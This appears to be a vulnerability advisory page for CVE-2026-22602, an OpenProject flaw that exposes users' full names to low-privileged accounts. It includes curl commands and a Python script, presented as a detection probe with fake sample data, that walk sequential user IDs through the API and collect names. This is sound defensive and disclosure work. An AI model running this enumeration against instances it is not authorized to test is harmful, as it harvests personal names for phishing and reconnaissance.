CVE-2026-22602
Information Disclosure in OpenProject Allows Full User Name Enumeration

Publication date: 2026-01-10

Last updated on: 2026-01-10

Assigner: GitHub, Inc.

Description
OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low‑privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users’ full names by iterating through these URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually.
Meta Information
Published: 2026-01-10
Last Modified: 2026-01-10
Generated: 2026-06-16
AI Q&A: 2026-01-11
EPSS Evaluated: 2026-06-14
Affected Vendors & Products
Vendor: opf
Product: openproject
Version / Range: all versions before 16.6.2 (16.6.2 itself is not affected)
CWE
CWE-200: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
AI Quick Actions
Compliance Impact

This vulnerability allows low-privileged logged-in users to enumerate the full names of other users because visibility restrictions on user records were not enforced. Such unauthorized disclosure of personal information can affect compliance with data protection regulations such as GDPR or HIPAA, which require that personal data be safeguarded and that access be limited to authorized personnel. By letting an attacker compile a list of user full names and infer organizational structure, the vulnerability raises the risk of privacy breaches and targeted attacks, which may in turn constitute non-compliance with those standards. OpenProject version 16.6.2 addresses the issue by properly restricting user visibility. [1]

Executive Summary

CVE-2026-22602 is an information-disclosure vulnerability in OpenProject versions prior to 16.6.2 that allows a low-privileged logged-in user to enumerate the full names of other users. Because user IDs are sequential and predictable, an attacker can iterate through user ID URLs, or through the OpenProject API, to extract a complete list of user full names. The cause is improper enforcement of visibility restrictions on user names in API endpoints and user queries. The vulnerability lets an attacker gather user information that should be restricted, which supports reconnaissance and further targeted attacks. It is fixed in version 16.6.2 by applying proper visibility scopes and access controls. [1, 3, 4]

Impact Analysis

An attacker holding any low-privileged account on your OpenProject instance can collect the full names of all users. Full names can be turned into likely email addresses for targeted phishing, and the list as a whole reveals who works in the organization and hints at its internal structure, which feeds further reconnaissance. The confidentiality impact is low, but the disclosure facilitates social engineering and targeted attacks against your users. The vulnerability does not affect data integrity or availability. [1]

Detection Guidance

This vulnerability can be detected by authenticating as a low-privileged user and requesting user profile URLs of the form http://hostname/users/{userID}, where userID is a small sequential integer, or the corresponding OpenProject API resource. On an affected instance, each request for an existing user returns that user's full name even though the requesting account has no legitimate reason to see it. With a session cookie saved in cookies.txt, for example:

curl -i -b cookies.txt http://hostname/users/1
curl -i -b cookies.txt http://hostname/users/2

and so on through the ID range; the API calls can be scripted in the same way. Two caveats: first, check the instance version before probing, since any version below 16.6.2 is affected regardless of what a single probe shows; second, run the probe only against an instance you are authorized to test, and with an account that is genuinely low-privileged, because an administrator's session would return the names legitimately and prove nothing. If the requests return other users' full names to such an account, the vulnerability exists. [1]
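The probe above can be scripted against the API rather than run by hand. The following Python script is an added example for this page, not code from OpenProject or from the advisory. It assumes the API v3 user resource GET /api/v3/users/{id} and HTTP basic authentication with the literal user name apikey and a personal API token as the password. Which status a patched instance returns for a user the caller may not see (403 or 404) is not stated on the page, so every non-200 response is treated as "not visible". It should be run with a test account that is a member of no project (an assumption needed for the check to be meaningful), so that any name other than the account's own counts as a disclosure. SAMPLE_DIRECTORY and the two fetchers prefixed fake_ are constructed data standing in for an unpatched and a patched instance, so the script runs offline.

```python
"""Probe for CVE-2026-22602-style full-name disclosure via the OpenProject API.

Added example, not OpenProject's own code. Assumed: GET /api/v3/users/{id},
basic auth as user "apikey" with an API token, and a test account that is a
member of no project. Responses other than 200 (403, 404, ...) are treated
as "not visible"; which one a patched instance sends is an assumption.
"""
import base64
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Tuple

# A fetcher maps a user ID to (HTTP status, decoded JSON body or {}).
Fetcher = Callable[[int], Tuple[int, dict]]


def make_api_fetcher(base_url: str, api_token: str, timeout: float = 10.0) -> Fetcher:
    """Build a fetcher for a live instance, authenticated as the low-privileged
    account whose API token is given."""
    auth = base64.b64encode(f"apikey:{api_token}".encode()).decode()

    def fetch(user_id: int) -> Tuple[int, dict]:
        req = urllib.request.Request(
            f"{base_url.rstrip('/')}/api/v3/users/{user_id}",
            headers={"Authorization": f"Basic {auth}", "Accept": "application/json"},
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, json.loads(resp.read().decode() or "{}")
        except urllib.error.HTTPError as err:
            return err.code, {}

    return fetch


def enumerate_user_names(fetch: Fetcher, start: int = 1, stop: int = 1000,
                         max_consecutive_misses: int = 50) -> Dict[int, str]:
    """Walk sequential user IDs and collect every full name the account can see.

    Stops early after max_consecutive_misses IDs in a row that are not visible,
    so a small or sparse instance does not need the whole range.
    """
    found: Dict[int, str] = {}
    misses = 0
    for user_id in range(start, stop + 1):
        status, body = fetch(user_id)
        if status == 200 and body.get("_type") == "User" and body.get("name"):
            found[user_id] = body["name"]
            misses = 0
        else:
            misses += 1
            if misses >= max_consecutive_misses:
                break
    return found


def is_vulnerable(fetch: Fetcher, own_user_id: int, **kwargs) -> bool:
    """With a test account that shares no project with anyone, the only name
    it should be able to read is its own; any other name is the disclosure."""
    return any(uid != own_user_id for uid in enumerate_user_names(fetch, **kwargs))


# Constructed sample data (not from any real instance) standing in for an
# unpatched server: every existing user ID answers 200 with the full name.
SAMPLE_DIRECTORY = {1: "OpenProject Admin", 2: "Alice Example",
                    3: "Bob Example", 7: "Carol Example"}


def fake_vulnerable_fetch(user_id: int) -> Tuple[int, dict]:
    name = SAMPLE_DIRECTORY.get(user_id)
    if name is None:
        return 404, {}
    return 200, {"_type": "User", "id": user_id, "name": name}


def fake_patched_fetch(user_id: int, own_user_id: int = 3) -> Tuple[int, dict]:
    """Patched behaviour as assumed here: only the caller's own record is visible."""
    if user_id != own_user_id:
        return 404, {}
    return fake_vulnerable_fetch(user_id)


if __name__ == "__main__":
    opts = dict(stop=20, max_consecutive_misses=10)
    print("unpatched sees:", enumerate_user_names(fake_vulnerable_fetch, **opts))
    print("unpatched vulnerable:", is_vulnerable(fake_vulnerable_fetch, own_user_id=3, **opts))
    print("patched vulnerable:", is_vulnerable(fake_patched_fetch, own_user_id=3, **opts))
```

Against a live instance, replace the fake fetcher with make_api_fetcher("https://hostname", "<api token>") and pass the test account's own user ID; keep max_consecutive_misses large enough to bridge gaps left by deleted users, otherwise the walk stops early and under-reports.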

Mitigation Strategies

The immediate steps to mitigate this vulnerability are:

1. Upgrade OpenProject to version 16.6.2 or later, where the issue is patched.
2. If upgrading is not immediately possible, apply the manual patch (21281.patch), which restricts user lookups by applying the User.visible scope.
3. Enable the "Login required" setting so that anonymous visitors cannot reach the instance at all. This only reduces exposure: the issue is exploitable by any logged-in user, so it remains reachable by every account on the instance until the patch or upgrade is in place, and if self-registration is enabled, anyone who can create an account counts as such a user.

After upgrading or patching, repeat the detection probe with the same low-privileged account to confirm that other users' full names are no longer returned. These steps prevent low-privileged users from enumerating the full names of other users. [1, 4]
